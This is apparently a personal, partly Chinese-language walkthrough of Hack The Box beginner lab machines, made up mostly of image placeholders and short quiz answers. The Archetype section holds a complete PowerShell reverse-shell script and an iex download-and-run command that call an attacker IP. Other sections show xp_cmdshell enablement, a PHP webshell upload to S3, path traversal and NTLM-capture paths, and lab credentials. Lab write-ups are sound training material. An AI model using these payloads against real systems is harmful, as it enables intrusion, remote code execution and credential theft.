Meow

image-20230206175627606

image-20230206174536717

image-20230206174546679

Virtual Machine

image-20230206175818020

Terminal

image-20230206181027449

openvpn

image-20230206181038820

tun

image-20230206181101333

ping

image-20230206181110680

nmap

image-20230206181201614

image-20230206181150222

telnet

image-20230206181236646

root

image-20230206181448142

image-20230206181408513

image-20230206181427180

Fawn

image-20230206184145534

File Transfer Protocol

image-20230206184254486

21

image-20230206185045555

sftp

image-20230206185201079

ping

image-20230206191033877

nmap 10.129.119.29 -p 21 -sV

image-20230206190731487

vsftpd 3.0.3

image-20230206191953692

unix

image-20230206192032593

ftp -H

image-20230206192150303

anonymous

image-20230206193037257

image-20230206193005172

230

image-20230206193259107

image-20230206193245833

ls

image-20230206193359569

image-20230206193347668

get

image-20230206193434105

image-20230206193417839

Dancing

image-20230206233828580

server message block 

image-20230206233853521

445

image-20230206234005320

nmap 10.129.44.223 -p 445

image-20230206234111336

image-20230207015202299

image-20230207015214960

-L

image-20230207020741444

4

image-20230207020842867

workshares

image-20230207021442054

get

image-20230207022035324

image-20230207022104548

Redeemer

image-20230207181240757

nmap -sS  10.129.100.239 --top-ports 5000 

image-20230207180914811

6379

image-20230207181413876

redis

image-20230207181447973

In-memory Database

image-20230207182137423

redis-cli

image-20230207182226640

-h

image-20230207182605126

image-20230207182550642

info

image-20230207182628928

5.0.7

image-20230207185114681

select

image-20230207185506925

image-20230207185449819

4

image-20230207190315731

keys *

image-20230207190320437

image-20230207190305239

Appointment

image-20230207193324797

Structured Query Language

image-20230207193556217

sql injection

image-20230207194117621

Personally Identifiable Information

image-20230207194644252

A03:2021-Injection

image-20230207195521269

image-20230207195454695

Apache httpd 2.4.38 ((Debian))

image-20230207195535458

443

image-20230207195741269

directory

image-20230207195929370

404

image-20230207200046085

dir

image-20230207200057263

#

image-20230207202904323

image-20230207201808751

image-20230207201817903

Congratulations

Sequel

image-20230207203150343

3306

image-20230207232927990

image-20230207232940220

MariaDB

image-20230207232957117

-u

image-20230207233009889

root

image-20230207233025993

*

image-20230207233857026

;

image-20230207234145269

image-20230207234128565

htb

image-20230207234759316

Crocodile

image-20230209124206871

-sC

image-20230209124317883

image-20230209124257748

vsFTPd 3.0.3

image-20230209124538707

image-20230209124521104

230

image-20230209124604080

anonymous

image-20230209124611319

get

image-20230209124711612

image-20230209124645632

image-20230209124701469

admin

image-20230209125350976

image-20230209125338265

Apache httpd 2.4.41

image-20230209131836191

-X

image-20230209132208017

login.php

密码在ftp服务

image-20230209132759510

image-20230209132829559

image-20230209132845125

Responder

image-20230209135731889

image-20230209135659603

unika.htb

hosts 文件中添加

image-20230209140144798

image-20230209140212966

image-20230209140426979

image-20230209140454616

php

image-20230209140511056

page

image-20230209140613675

../../../../../../../../windows/system32/drivers/etc/hosts

image-20230209140642669

//10.10.14.6/somefile

image-20230209145146047

New Technology

image-20230209172519832

image-20230209172500168

-I

image-20230209173625814

John the Ripper

image-20230209174709960

image-20230209174723015

image-20230209174728947

image-20230209174804175

image-20230209174754995

image-20230209175231311

image-20230209175617496

可以看到密码是badminton

image-20230209180705343

image-20230209192115528

image-20230209191750240

image-20230209192105901

5985

image-20230209193313661

Three

image-20230209200522621

image-20230209195405065

2

image-20230209200717038

image-20230209200700738

thetoppers.htb

image-20230209201410743

/etc/hosts

image-20230209203214804

image-20230210173244081

高版本需要这样才能扫到

gobuster vhost -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u http://thetoppers.htb --append-domain

image-20230212165028171

image-20230210174102491

image-20230210174113567

s3.thetoppers.htb

image-20230210173431041

image-20230210173346595

amazon s3

image-20230211191615347

image-20230211191602197

awscli

image-20230212130426043

image-20230212130451552

aws configure

image-20230212131117703

列出存储桶

aws --endpoint=http://s3.thetoppers.htb s3 ls

image-20230212162718750

aws s3 ls

image-20230212162739643

列出存储桶中的文件

aws  --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

image-20230212162703431

php
aws  --endpoint=http://s3.thetoppers.htb s3 cp zf.php s3://thetoppers.htb

image-20230212162956915

写一个一句话木马上传

image-20230212163703965

image-20230212163819371

Archetype

image-20230212191516755

image-20230212191508618

1433

image-20230212191659660

image-20230212191645776

backups

image-20230212191917202

image-20230212191851406

image-20230212191900954

prod.dtsConfig 是一个mssql配置文件

M3g4c0rp123

image-20230212193146753

image-20230212193001823

mssqlclient.py

image-20230212193221613

select is_srvrolemember ('sysadmin')  -- 查看当前登录是否具有 sysadmin 权限
enable_xp_cmdshell

image-20230212194003861

EXEC sp_configure 'Show Advanced Options', 1;
-- 使用 sp_configure 系统存储过程设置服务器配置选项；将 Show Advanced Options 设为 1 后，才允许修改高级配置选项
reconfigure;
-- 使上面的设置生效
sp_configure;
-- 查看当前 sp_configure 配置情况
EXEC sp_configure 'xp_cmdshell', 1
-- 使用 sp_configure 系统存储过程启用 xp_cmdshell 选项，允许 SQL Server 调用操作系统命令
reconfigure;
-- 使上面的设置生效
xp_cmdshell "whoami"
-- 在靶机上通过 xp_cmdshell 执行 whoami
xp_cmdshell

image-20230212194412756

尝试powershell 反弹shell

vim zf.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.128",5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
python3 -m http.server  

image-20230212194536622

image-20230212194626836

xp_cmdshell powershell iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.128/zf.ps1'');

image-20230212195233800

image-20230212195325051

3e7b102e78218e935bf3f4951fec21a3

image-20230212195507795

WinPEAS

image-20230212200956446

https://github.com/carlospolop/PEASS-ng/releases

image-20230212195813224

wget http://10.10.14.128/winPEASany.exe -o winpeas.exe

image-20230212200153424

./winpeas.exe log=result.txttype

image-20230212200639041

image-20230212200906099

这里找到 admin 密码

image-20230212200914259

ConsoleHost_history.txt
impacket-psexec administrator@10.129.71.45
MEGACORP_4dm1n!!

image-20230212202055369

image-20230212202248476